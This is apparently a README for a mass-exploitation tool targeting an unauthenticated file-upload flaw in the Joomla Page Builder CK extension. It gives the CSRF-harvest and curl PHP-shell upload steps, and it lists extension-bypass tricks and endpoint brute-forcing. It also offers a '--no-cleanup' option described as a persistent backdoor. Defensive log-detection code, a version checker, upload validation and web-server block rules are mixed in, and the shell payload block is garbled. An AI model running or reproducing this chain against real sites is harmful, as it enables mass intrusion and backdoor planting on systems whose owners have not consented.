## https://sploitus.com/exploit?id=016F4AA9-EE0B-5CBF-994B-B5E79CF929C3
# Mass Exploitation & Validation Framework for Joomla Page Builder CK

Unauthenticated Arbitrary File Upload → Remote Code Execution

---

## 📑 Table of Contents

- [Vulnerability Overview](#-vulnerability-overview)
- [Affected Versions](#-affected-versions)
- [Features](#-features)
- [Installation](#-installation)
- [Usage](#-usage)
- [Proof of Concept](#-proof-of-concept)
- [Technical Deep-Dive](#-technical-deep-dive)
- [Detection Methodology](#-detection-methodology)
- [Defense & Mitigation](#-defense--mitigation)
- [Disclaimer](#-disclaimer)
- [References](#-references)

---

## 🔴 Vulnerability Overview

**CVE-2026-56290** is a critical-severity vulnerability in **Page Builder CK** (`com_pagebuilderck`), a popular Joomla page builder extension. The `browse.ajaxAddPicture` controller method accepts unauthenticated file uploads with a **user-controlled destination path**, allowing attackers to write arbitrary PHP files to web-accessible directories.

### The Root Cause

```php
// browse.php controller: NO authentication check
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // ← user-controlled file
    $path  = trim($input->get('path', ''));       // ← user-controlled path, only trim()!
    // ... uploads file to $path without validating the destination
}
```

The `path` parameter receives **only `trim()`**: no allow-list of destinations, no directory traversal check, and no authentication gate in front of the method. Joomla's per-session CSRF token is readable by any visitor from the HTML of a public page (it is a hidden form input, not a secret), so the token check adds nothing here, and an attacker can upload a PHP file into any directory the web server can write to.

### Impact

| Vector | Severity | Impact |
|--------|----------|--------|
| Unauthenticated File Upload | **9.8 (Critical)** | Arbitrary PHP code execution |
| CSRF Token Harvesting | **5.3 (Medium)** | Enables the upload chain |
| Information Disclosure | **5.3 (Medium)** | Extension version fingerprinting |

### The Attack Chain

```
1. HIT Joomla homepage      →  harvest CSRF token (hex32 + value "1")
2. POST file upload         →  task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in       →  media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL            →  code executes, RCE confirmed
5. POST f=@file to shell    →  upload additional tools
6. GET ?cleanup=1           →  shell self-destructs
```
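Every step of the chain above leaves a line in the web server's access log, which is what makes the chain detectable from the defender's side. The following Python is an added example, not code from the pbck-exploit tool: it parses combined-format access log lines (the sample lines are constructed), tags the two observable steps, a request carrying `task=browse.ajaxAddPicture` and a request for a PHP-like file under `/media/com_pagebuilderck/`, and reports clients that did both.

```python
"""Flag CVE-2026-56290 attack-chain activity in web server access logs.

Added example, not code from the pbck-exploit tool. The log lines below
are constructed; the request shapes follow the chain in the README.
"""
import re
from urllib.parse import unquote

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Chain step 2: the upload controller is addressed by its task name.
UPLOAD_TASK_RE = re.compile(r"task=browse\.ajaxAddPicture", re.I)

# Chain steps 4-6: a PHP-like file requested under the component's media tree.
# Case-insensitive and tolerant of a trailing dot, so the case-juggled and
# "php." variants listed under Extension Bypass are caught as well.
MEDIA_PHP_RE = re.compile(
    r"^/media/com_pagebuilderck/.*\.(?:php\d?|pht|phtml|phar|inc)\.?(?:$|\?)", re.I
)

# Constructed sample log (203.0.113.10 runs the chain; 198.51.100.7 is benign).
CONSTRUCTED_LOG = """\
203.0.113.10 - - [04/Jul/2026:15:30:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "python-requests/2.31"
203.0.113.10 - - [04/Jul/2026:15:30:02 +0000] "POST /index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6=1 HTTP/1.1" 200 87 "-" "python-requests/2.31"
203.0.113.10 - - [04/Jul/2026:15:30:03 +0000] "GET /media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.pHP HTTP/1.1" 200 42 "-" "python-requests/2.31"
198.51.100.7 - - [04/Jul/2026:15:31:00 +0000] "GET /media/com_pagebuilderck/css/pagebuilderck.css HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
203.0.113.10 - - [04/Jul/2026:15:30:04 +0000] "GET /media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.pHP?cleanup=1 HTTP/1.1" 200 12 "-" "python-requests/2.31"
"""


def classify_line(line):
    """Return the list of finding tags for one log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path = unquote(m.group("path"))  # normalise %-encoding before matching
    findings = []
    if UPLOAD_TASK_RE.search(path):
        findings.append("pbck_upload_task")
    if MEDIA_PHP_RE.search(path):
        findings.append("php_under_pbck_media")
        if "cleanup=1" in path.lower():
            findings.append("shell_cleanup")
    return findings


def scan_log(text):
    """Group findings per client IP and list clients that show the full chain
    (an upload-task request followed by a PHP request under the media tree)."""
    per_ip = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        tags = classify_line(line)
        if m and tags:
            per_ip.setdefault(m.group("ip"), set()).update(tags)
    chain_hits = sorted(
        ip for ip, tags in per_ip.items()
        if {"pbck_upload_task", "php_under_pbck_media"} <= tags
    )
    return per_ip, chain_hits


if __name__ == "__main__":
    per_ip, hits = scan_log(CONSTRUCTED_LOG)
    for ip, tags in per_ip.items():
        print(ip, sorted(tags))
    print("full chain observed from:", hits)
```

A single request for a PHP-like file under `media/` is already worth an alert on a site that never legitimately serves PHP from there; the per-IP grouping exists so the upload request and the follow-up fetch can be tied together when both are present.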

---

## 🟠 Affected Versions

| Page Builder CK Version | Status | Notes |
|:---|:---:|:---|
| **3.1.1 and below** | 🔴 **Vulnerable** | Confirmed unauthenticated upload |
| **3.4.10 and below** | 🔴 **Vulnerable** | Extended range per analysis |
| **3.5.10 and below** | 🔴 **Vulnerable** | Some patched variants may exist |
| > 3.5.10 | 🟢 Possibly Patched | Verify via manifest XML |

> **Note:** Version is detected from the Joomla manifest file at `/administrator/manifests/files/com_pagebuilderck.xml`. If the manifest is inaccessible, the scanner defaults to treating the target as potentially vulnerable.
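To turn the table and the note above into an audit check, the following Python (an added example, not part of the scanner) reads a Page Builder CK manifest, extracts its `<version>` element and classifies it against the 3.5.10 boundary from the table. The manifest text is a constructed sample, and an unreadable or missing manifest falls back to "potentially vulnerable", the same default the note describes.

```python
"""Classify a Page Builder CK manifest version against the README's table.

Added example, not part of the pbck-exploit tool. SAMPLE_MANIFEST is a
constructed stand-in for the file a site serves at
/administrator/manifests/files/com_pagebuilderck.xml.
"""
import re
import xml.etree.ElementTree as ET

# From the Affected Versions table: 3.5.10 and below are listed as vulnerable,
# anything newer is only "possibly patched" and must be verified.
LAST_KNOWN_VULNERABLE = (3, 5, 10)

# Constructed sample of a Joomla file-extension manifest (illustrative only).
SAMPLE_MANIFEST = """<extension type="file" method="upgrade">
    <name>Page Builder CK</name>
    <version>3.4.7</version>
    <description>Constructed sample manifest</description>
</extension>
"""


def parse_version(text):
    """Turn '3.4.7' into (3, 4, 7); a non-numeric trailer such as '-rc1' is dropped."""
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    if not parts:
        raise ValueError("no numeric version in %r" % text)
    return tuple(parts)


def manifest_version(xml_text):
    """Extract the <version> element from a Joomla extension manifest."""
    root = ET.fromstring(xml_text)
    node = root.find("version")
    if node is None or not (node.text or "").strip():
        raise ValueError("manifest has no <version> element")
    return node.text.strip()


def classify(version_text):
    """Map a version string onto the table's two outcomes."""
    if parse_version(version_text) <= LAST_KNOWN_VULNERABLE:
        return "vulnerable"
    return "possibly_patched"  # newer than the listed range: verify the fix


def audit_manifest(xml_text=None):
    """Return (version, status). None or unparsable input means the manifest
    could not be read, which the README treats as potentially vulnerable."""
    if xml_text is None:
        return "unknown", "potentially_vulnerable"
    try:
        ver = manifest_version(xml_text)
    except (ET.ParseError, ValueError):
        return "unknown", "potentially_vulnerable"
    return ver, classify(ver)


if __name__ == "__main__":
    print(audit_manifest(SAMPLE_MANIFEST))
```

Tuple comparison handles versions with fewer components than the boundary (`3.5` sorts below `3.5.10`), so a two-part version string is still classified on the vulnerable side rather than silently skipped.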

---

## ✨ Features

### 🔍 Reconnaissance
- **Joomla detection**: two-phase, HTML fingerprints plus an admin panel probe
- **PBCK detection**: direct path probes plus HTML pattern matching
- **Version extraction**: manifest XML parsing with an HTML regex fallback
- **CSRF token harvesting**: multi-page token extraction (home, login, registration, admin)
- **Endpoint brute-forcing**: 1000+ task/param/path combos with time-budgeted discovery

### 💀 Exploitation
- **40+ extension bypasses**: case juggling, numbered variants, double extensions, Windows tricks
- **20+ destination paths**: extension dirs, Joomla writable dirs, traversal paths
- **Shell validation**: token-based confirmation that PHP executes
- **Auto-cleanup**: shells self-destruct after validation (`?cleanup=1`)
- **Live TXT output**: real-time, thread-safe results written to file
- **JSON report**: structured report with full per-target details

---

## 📦 Installation

```bash
# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Install dependencies
pip install -r requirements.txt

# Verify
python cve_2026_56290.py --help
```

### Requirements

```txt
requests>=2.28.0
urllib3>=1.26.0
```

---

## 📖 Usage

### Command Line Arguments

```
CVE-2026-56290 - PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator

  -t, --target        Single target URL
  -f, --file          File with target URLs (one per line, # for comments)
  -o, --output        Live TXT output file (default: cve-2026-56290_live.txt)
  --json              JSON report file path (default: cve-2026-56290_report.json)
  --threads           Concurrent workers (default: 20)
  --timeout           Request timeout in seconds (default: 15)
  --no-cleanup        Leave shells on target (persistent backdoor)
  -v, --verbose       Verbose endpoint discovery output
  --known-endpoint    Skip discovery: task,file_param,folder_param
```

### Basic Usage

```bash
# Single target
python cve_2026_56290.py -t https://target.com

# Mass scan from file
python cve_2026_56290.py -f targets.txt

# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v

# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup

# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"
```

### Target File Format

```
# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored
```

---

## 🧪 Proof of Concept

### Scenario 1: Mass Scan with Live Output

```bash
$ python cve_2026_56290.py -f targets.txt -o live_results.txt
```

```
──────────────────────────────────────────────────────────────
  CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
  Live TXT: live_results.txt
  2026-07-04 15:30:00
──────────────────────────────────────────────────────────────

  ✅ https://target-vuln.com  [rce_confirmed]  12.4s
     PBCK: 3.4.7 [VULN]
     RCE  : ext=php | path=media/com_pagebuilderck/gfonts/
     Shell: https://target-vuln.com/media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.php
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

  🛡️ https://target-patched.com  [patched]  3.2s

  ✅ https://target-vuln2.com  [rce_confirmed]  15.1s
     PBCK: 3.1.0 [VULN]
     RCE  : ext=pHP | path=media/com_pagebuilderck/fonts/
     Shell: https://target-vuln2.com/media/com_pagebuilderck/fonts/pbck_x7k2m4v9.pHP
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

==================================================
  SCAN SUMMARY
==================================================
  Total           : 5
  ✅ RCE Confirmed : 2
  ⚠️  RCE Failed    : 1
  🛡️  Patched       : 1
  🔍 Need Diff     : 0
  ❌ Not Joomla    : 0
  ⏭️  No Component  : 1
  💥 Errors         : 0
==================================================
```

---

### Scenario 2: Manual Reproduction (curl + Python)

**Step 1: Harvest CSRF Token**

```bash
curl -sk 'https://target.com/' | grep -oP 'name="[a-f0-9]{32}" value="1"'
# name="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6" value="1"
```

**Step 2: Upload PHP Shell**

```bash
TOKEN="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6"

curl -sk \
  -F "file=@shell.php;type=application/x-php" \
  -F "path=media/com_pagebuilderck/gfonts/" \
  "https://target.com/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&${TOKEN}=1"
```

**Step 3: Verify RCE**

```bash
curl -sk 'https://target.com/media/com_pagebuilderck/gfonts/shell.php'
# → PHP shell output, confirms code execution
```

---

### Scenario 3: The PHP Shell Payload

The scanner deploys a **self-contained uploader shell** that needs no `exec()`, `system()`, or `eval()`:

```php


  
  

';
?>
```

**Shell capabilities:**
- 📤 Upload additional files via POST `f=@file`
- 🧹 Self-destruct via `?cleanup=1`
- 🔑 Token-based validation (scanner verifies the unique token in output)

---

## 🔬 Technical Deep-Dive

### Architecture

```
┌─────────────────────────────────────────────────────────┐
│                      PBCK-EXPLOIT                       │
├──────────────────┬──────────────────────────────────────┤
│   RECON PHASE    │           EXPLOIT PHASE              │
│                  │                                      │
│  ┌────────────┐  │  ┌──────────────┐  ┌──────────────┐  │
│  │ Joomla     │  │  │ Endpoint     │  │ Extension    │  │
│  │ Detection  │  │  │ Brute-force  │  │ Bypass Grid  │  │
│  │ (2-phase)  │  │  │ (1000+ combo)│  │ (40+ exts)   │  │
│  └─────┬──────┘  │  └──────┬───────┘  └──────┬───────┘  │
│        │         │         │                 │          │
│  ┌─────▼──────┐  │  ┌──────▼───────┐  ┌──────▼───────┐  │
│  │ PBCK       │  │  │ CSRF Token   │  │ PHP Shell    │  │
│  │ Detection  │  │  │ Harvester    │  │ Deployment   │  │
│  │ (probes)   │  │  │ (5 pages)    │  │ (20+ paths)  │  │
│  └─────┬──────┘  │  └──────┬───────┘  └──────┬───────┘  │
│        │         │         │                 │          │
│  ┌─────▼──────┐  │         │          ┌──────▼───────┐  │
│  │ Version    │  │         │          │ Validation   │  │
│  │ Check      │  │         │          │ + Cleanup    │  │
│  └────────────┘  │         │          └──────────────┘  │
└──────────────────┴──────────────────────────────────────┘
```

### Endpoint Discovery Strategy

The scanner uses a **tiered brute-force** approach with a per-target time budget (15s):

| Tier | Tasks | File Params | Folder Params | Dest Paths | Total Combos |
|:---|:---|:---|:---|:---|:---|
| **Tier 1** (confirmed) | `browse.ajaxAddPicture` + 3 others | `file`, `Filedata` | `path`, `folder`, `dir` | Top 4 PBCK dirs | 96 |
| **Tier 2** (full grid) | 12 tasks | 4 params | 5 params | 20+ paths | 4,800+ |

For each combination the scanner uploads a `.txt` probe, fetches it back with a GET, and counts a content match as success; discovery stops at the first confirmed combination.

### Extension Bypass Philosophy

The extension's `CKFile::makeSafe()` rejects a plain `.php` extension on some configurations, so the scanner walks through the following tiers, moving down only when the current tier is blocked:

```
Tier 1: Fast
  php, PHP, pht, phar
         ↓ (if blocked)
Tier 2: Case juggling
  Php, pHp, PhP, pHt, PHT, PhTmL, pHtml, ...
         ↓ (if blocked)
Tier 3: Alternative handlers
  php3, php4, php5, php6, php7, php8, phtml, shtml, inc
         ↓ (if blocked)
Tier 4: Double extensions
  php.jpg, jpg.php, php.png, php.gif, php.txt
         ↓ (if blocked)
Tier 5: Windows tricks
  php., PHP., php. , php.SWF
```
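The hardened counterpart to the `trim()`-only handling shown under The Root Cause, and the reason each tier above exists, is a destination and file-name check that normalizes the path and allow-lists exactly one extension. The Python below is an added example, not code from Page Builder CK or from the scanner; the upload base directory is an assumption. It confines the folder to that base and rejects every name shape in the five tiers: case variants, alternative handlers, double extensions and trailing dots.

```python
"""Validate an upload destination and file name the way ajaxAddPicture should.

Added example, not code from Page Builder CK or from the pbck-exploit tool.
ALLOWED_BASE is an assumed directory used only for illustration.
"""
import posixpath
import re

# Assumption for the example: uploads may only land somewhere under this tree.
ALLOWED_BASE = "/var/www/html/media/com_pagebuilderck/uploads"

# Strict allow-list of image extensions; the name must have exactly one dot,
# so "shell.php.jpg", "shell.pHP" and "shell.php." never reach the allow-list
# comparison in a form the web server could execute.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "webp"}
SAFE_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9_-]{0,63}\.([a-z0-9]{1,5})$")


class UploadRejected(ValueError):
    """Raised when a destination or file name fails validation."""


def safe_destination(user_path, base=ALLOWED_BASE):
    """Resolve a user-supplied relative folder and confirm it stays inside base."""
    if not isinstance(user_path, str) or "\x00" in user_path:
        raise UploadRejected("bad path type or NUL byte")
    # Treat backslashes as separators so Windows-style traversal is not missed.
    rel = user_path.replace("\\", "/").strip()
    if rel.startswith("/"):
        raise UploadRejected("absolute path not allowed")
    candidate = posixpath.normpath(posixpath.join(base, rel))
    # normpath collapses ".." segments; the result must still be base or below.
    if candidate != base and not candidate.startswith(base + "/"):
        raise UploadRejected("path escapes the upload base: %r" % user_path)
    return candidate


def safe_filename(name):
    """Accept only <stem>.<allow-listed ext>, lower-cased, single dot, no trailing dot."""
    if not isinstance(name, str) or "\x00" in name:
        raise UploadRejected("bad file name")
    # Drop any directory component a client may have smuggled into the name.
    base_name = name.replace("\\", "/").rsplit("/", 1)[-1]
    m = SAFE_NAME_RE.match(base_name.lower())
    if not m:
        raise UploadRejected("file name not in strict form: %r" % name)
    if m.group(1) not in ALLOWED_EXT:
        raise UploadRejected("extension not allow-listed: %r" % name)
    return base_name.lower()


def resolve_upload(user_path, filename, base=ALLOWED_BASE):
    """Full check: returns the final on-disk path or raises UploadRejected."""
    folder = safe_destination(user_path, base)
    return posixpath.join(folder, safe_filename(filename))


def is_accepted(user_path, filename):
    """Boolean wrapper around resolve_upload for quick checks."""
    try:
        resolve_upload(user_path, filename)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    for p, f in [("gallery", "photo.jpg"), ("../../gfonts/", "shell.php"),
                 ("gallery", "shell.pHP"), ("gallery", "shell.php.jpg"),
                 ("gallery", "shell.php."), ("gallery", "shell.phtml")]:
        print("%-16s %-14s -> %s" % (p, f, is_accepted(p, f)))
```

In a real deployment the folder check should run on `os.path.realpath()` of the candidate as well, so that a symlink inside the base cannot point the write outside it; the normalization shown here only handles the textual traversal the README's "traversal paths" rely on. Authentication and a server-side CSRF check belong in front of this function, not inside it.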

### CSRF Token Harvesting

Joomla embeds its session CSRF token in **every rendered page** (home, login, registration, contact forms, admin), so the scanner tries these paths in turn:

```python
CSRF_PAGES = [
    "",                                                            # homepage
    "/index.php?option=com_users&view=login",                       # login
    "/index.php?option=com_users&view=registration",                # registration
    "/index.php?option=com_contact&view=contact&id=1",              # contact
    "/administrator/index.php",                                     # admin login
]
```

Pattern A (HTML hidden input): `<input type="hidden" name="<32-hex-token>" value="1">`

Pattern B (JSON script options): `"csrf.token":"<32-hex-token>"`

Here `<32-hex-token>` stands for the 32-character hexadecimal token value.

---

## 🔍 Detection Methodology

### Joomla Detection (2-Phase)

**Phase 1: HTML Fingerprints (fast, definitive)**
- Generator meta tag containing "Joomla!"
- Structural elements: `joomla-script-options`, `"csrf.token"`
- Path patterns: `/components/com_`, `/modules/mod_`, `/plugins/system/`
- Session cookie analysis

**Phase 2: Admin Panel Probe (fallback)**
- Fetches the `/administrator/` page
- Checks for Joomla-specific admin markers: `name="username"`, `mod-login-`, `administrator/templates/`

### PBCK Detection (3-Tier)

**Tier 1: HTML strong indicators**
```
com_pagebuilderck, /pagebuilderck/, /media/com_pagebuilderck
```

**Tier 2: HTML weak indicators with confirmation**
```
pagebuilderck + (pbck_ | pagebuilderck.css | pagebuilderck.js)
```

**Tier 3: Direct file probes** (catches installs where PBCK isn't loaded on the homepage)
```
/media/com_pagebuilderck/css/pagebuilderck.css
/media/com_pagebuilderck/js/pagebuilderck.js
/administrator/manifests/files/com_pagebuilderck.xml
```

---

## 🛡️ Defense & Mitigation

### 1. Upgrade Immediately
```bash
# Update Page Builder CK to the latest patched version
# Check: https://extensions.joomla.org/extension/page-builder-ck/
```

### 2. Block the Upload Endpoint
```nginx
# Nginx: block requests whose query string names the upload controller.
# A "location" regex matches only the URI path, never the query string,
# so the test has to run against $args (place this inside the server block).
if ($args ~* "task=browse\.ajaxAddPicture") {
    return 403;
}
```

```apache
# Apache/.htaccess
RewriteCond %{QUERY_STRING} task=browse\.ajaxAddPicture [NC]
RewriteRule ^ - [F]
```

Both rules inspect only the query string. Joomla also reads `task` from a POST body, so treat them as a stopgap against the request shape shown in this README, not as a substitute for the upgrade.

### 3. Harden PHP Execution in Writable Directories
```apache
# .htaccess in media/ : refuse to serve anything PHP-like from this tree.
# (?i) makes the match case-insensitive so case-juggled names such as
# shell.pHP are covered; the optional trailing dot covers the "php." variant.
<FilesMatch "(?i)\.(php[0-9]?|pht|phtml|phar|inc)\.?$">
    Require all denied
</FilesMatch>
```

This requires `AllowOverride` to permit `Require` (AuthConfig) in `.htaccess`. Nginx ignores `.htaccess` files entirely, so the same restriction has to be expressed in its PHP `location` rules.

### 4. Audit Your Fleet
```bash
# Scan your own infrastructure
python cve_2026_56290.py -f my_joomla_sites.txt -o audit_results.txt
```

---

## ⚠️ Disclaimer

> ### 🚨 FOR EDUCATIONAL & AUTHORIZED TESTING PURPOSES ONLY
>
> This software is provided **solely for educational purposes** and **legitimate security research**. It is intended to be used by:
>
> - 🛡️ **Security professionals** conducting authorized penetration tests
> - 🏢 **Organizations** auditing their own Joomla infrastructure
> - 🔬 **Researchers** studying vulnerability exploitation techniques
> - 🎓 **Students** learning about web application security
>
> ### ❌ You may NOT use this software to:
>
> - Access computer systems **without explicit written authorization**
> - Compromise, damage, or disrupt systems you do not **own**
> - Engage in **illegal activity** of any kind
>
> ### ⚖️ Legal Notice
>
> Unauthorized access to computer systems violates laws including but not limited to:
> - **United States:** Computer Fraud and Abuse Act (18 U.S.C. § 1030)
> - **Indonesia:** Electronic Information and Transactions Law (UU ITE) Articles 30 & 46 (Law No. 11 of 2008 in conjunction with Law No. 1 of 2024)
> - **European Union:** Directive 2013/40/EU
> - **United Kingdom:** Computer Misuse Act 1990
>
> **The author(s) assume NO LIABILITY for any misuse, damage, or legal consequences resulting from the use of this tool. By using this software, you acknowledge that you are solely responsible for your actions and agree to comply with all applicable laws.**

---

## 📚 References

| Resource | Link |
|:---|:---|
| NVD Entry | [CVE-2026-56290](https://nvd.nist.gov/vuln/detail/CVE-2026-56290) |
| Joomla Security | [developer.joomla.org/security](https://developer.joomla.org/security.html) |
| Page Builder CK | [extensions.joomla.org](https://extensions.joomla.org/extension/page-builder-ck/) |
| OWASP File Upload | [Unrestricted File Upload](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload) |

---


⚡ Built with precision for the security research community ⚡

Joomla® is a registered trademark of Open Source Matters, Inc.

This project is not affiliated with or endorsed by Joomla, Open Source Matters, or Page Builder CK.